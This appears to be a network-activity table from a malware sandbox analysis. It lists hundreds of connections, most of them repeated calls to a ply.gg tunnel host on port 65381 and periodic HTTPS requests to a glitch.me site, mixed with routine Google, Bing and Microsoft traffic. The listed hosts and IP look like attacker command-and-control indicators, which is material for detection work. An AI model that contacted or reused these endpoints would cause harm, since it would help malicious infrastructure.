| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50151 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 13.107.6.158:80 | edge-http.microsoft.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| N/A | 127.0.0.1:50188 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50220 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50243 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50264 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50280 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50298 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.192:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| US | 13.107.21.239:443 | edge.microsoft.com | tcp |
| N/A | 127.0.0.1:50310 | tcp | |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50328 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50340 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.143:443 | www.bing.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50365 | tcp | |
| N/A | 127.0.0.1:50368 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50388 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50400 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50416 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50441 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50449 | tcp | |
| N/A | 127.0.0.1:50465 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50490 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50493 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50520 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50523 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50541 | tcp | |
| N/A | 127.0.0.1:50553 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50580 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| N/A | 127.0.0.1:50587 | tcp | |
| N/A | 127.0.0.1:50614 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50621 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50646 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50662 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50671 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| N/A | 127.0.0.1:50694 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50708 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50741 | tcp | |
| N/A | 127.0.0.1:50753 | tcp | |
| N/A | 127.0.0.1:50769 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50785 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50817 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50830 | tcp | |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50853 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.143:443 | www.bing.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50865 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50894 | tcp | |
| N/A | 127.0.0.1:50896 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50924 | tcp | |
| N/A | 127.0.0.1:50927 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50948 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50951 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:50978 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50981 | tcp | |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51008 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51020 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51023 | tcp | |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| N/A | 127.0.0.1:51050 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51086 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51126 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
